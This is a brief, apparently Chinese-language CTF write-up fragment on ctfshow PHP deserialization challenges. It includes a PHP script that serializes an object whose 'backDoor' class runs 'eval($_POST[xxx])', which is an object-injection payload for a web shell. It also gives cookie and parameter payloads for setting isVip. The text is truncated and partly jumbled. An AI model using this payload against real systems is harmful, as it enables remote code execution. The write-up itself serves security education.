<?php class ctfShowUser{ public function __construct(){ $this->class=new backDoor(); } } class backDoor{ private $code = 'eval($_POST[xxx]);'; public function getInfo(){ eval($this->code); } } $user = new ctfShowUser(); echo urlencode(serialize($user)); // O%3A11%3A%22...
定义了一个类ctfshowuser,定义了三个变量,定义了了三个函数,这题只要使isVip变量为true即可,就是传入的username和password和原来定义的变量值相等 payload: username=xxxxxx&password=xxxxxx 2.web255 这题需要在cookie中传递使isVip为true即可,并且需要进行序列化操作 paylaod: cookie传入,get请求usernmae=xxxxxx&...